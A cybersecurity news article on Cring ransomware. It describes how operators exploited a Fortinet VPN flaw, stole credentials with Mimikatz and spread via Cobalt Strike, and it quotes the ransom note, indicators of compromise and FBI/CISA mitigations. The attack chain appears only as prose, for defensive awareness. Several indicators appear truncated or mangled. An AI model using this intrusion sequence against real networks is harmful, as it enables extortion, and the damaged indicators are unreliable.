Security experts from Kaspersky identified a new strain of ransomware exploiting unpatched vulnerabilities in Fortinet VPN devices. Dubbed as Cring, the ransomware is targeting industrial sector entities to compromise and encrypt their network systems. Kaspersky stated that the operators behind the Cring ransomware performed a series of attacks on industries in European countries in Q1 2021. Attackers temporally disrupted their operations by encrypting critical systems in demand for ransom.
Cring ransomware, also known as Ghost, Crypt3r, Vjiszy1lo, Phantom, was initially discovered by Amigo_A in January 2021, and reported by the CSIRT team of Swiss telecommunications provider Swisscom.
CRING a new strain deployed by human operated ransomware actors. After the actors have established initial access, they drop a customized Mimikatz sample followed by #CobaltStrike. The #CRING #ransomware is then downloaded via certutill. ^mikehttps://t.co/v5h8eqHCPt pic.twitter.com/fkU2USEZis
— Swisscom CSIRT (@swisscom_csirt) January 26, 2021
How Cring Ransomware Spreads
The attackers exploited the CVE-2018-13379 vulnerability in the Fortinet VPN to gain access to the corporate network and extract the session file of the VPN Gateway, which contained sensitive information such as usernames and passwords in plaintext.
After gaining access to the first system, the Cring operators download the Mimikatz utility to that system, which is then used to steal the account credentials of Windows users who had logged into the affected system earlier. Leveraging the Mimikatz utility, the attackers compromise the domain administrator account to deploy ransomware payloads on other systems on the company’s network by using the Cobalt Strike framework.
“Sorry, your network is encrypted, and most files are encrypted using special technology. The file cannot be recovered by any security company. If you do not believe that you can even consult a security company, your answer will be that you need to pay the corresponding fees, but we have a good reputation. After receiving the corresponding fee, we will immediately send the decryption program and KEY. You can contact us to get two file decryption services, and then you will get all decryption services after paying our fee, usually, the cost is about 2 bitcoins,” Cring operators ransom note read.
- The Cringe operators identified the vulnerable device themselves by scanning IP addresses.
- The operators may have bought a ready-made list containing IP addresses of vulnerable Fortigate VPN Gateway devices.
- Several days before the initiation of the main attack phase, the attackers performed test connections to the VPN Gateway, apparently to check that the vulnerable version of the software was used on the device.
- In autumn 2020, an offer to buy a database of such devices appeared on a dark web forum.
Indicators of compromise (IOC)
- %temp%\execute.bat (downloader script)
- C:__output (Cring executable)
- c5d712f82d5d37bb284acd4468ab3533 (Cring executable)
- 317098d8e21fa4e52c1162fb24ba10ae (Cring executable)
- 44d5c28b36807c69104969f5fed6f63f (downloader script)
- 227.156[.]216 (used by the threat actor during the attack)
- 227.156[.]214 (used by the threat actor during the attack)
- 12.112[.]204 (Cobalt Strike CnC)
- 67.231[.]128 (malware hosting)
APT Group Targets Fortinet products
In a related news, federal agencies recently warned about the Advanced Persistent Threat (APT) actors targeting unpatched vulnerabilities in Fortinet FortiOS. In a joint advisory, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) revealed that threat actors are scanning devices on ports 4443, 8443, and 10443 to exploit unpatched vulnerabilities – CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
Reportedly, the APT actors are trying to break into multiple governments, commercial, and technology services networks to launch various cyberattacks like Distributed Denial-of-service (DDoS) attacks, ransomware, SQL injection attacks, spear-phishing campaigns, website defacements, and disinformation campaigns.
The FBI and CISA also recommended certain security measures. These include:
- Immediately patch CVE-2018-13379, CVE-2020-12812, and CVE-2019-5591.
- If FortiOS is not used by your organization, add key artifact files used by FortiOS to your organization’s execution deny list. Any attempts to install or run this program and its associated files should be prevented.
- Regularly back up data, air gap, and password-protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the primary system where the data resides.
- Implement a recovery plan to restore sensitive or proprietary data from a physically separate, segmented, secure location (e.g., hard drive, storage device, the cloud). • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
- Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.
- Focus on awareness and training. Provide users with training on information security principles and techniques, particularly on recognizing and avoiding phishing emails.
“The APT actors may be using any or all of these CVEs to gain access to networks across multiple critical infrastructure sectors to gain access to key networks as pre-positioning for follow-on data exfiltration or data encryption attacks. APT actors may use other CVEs or common exploitation techniques to gain access to critical infrastructure networks to pre-position for follow-on attacks,” the advisory added.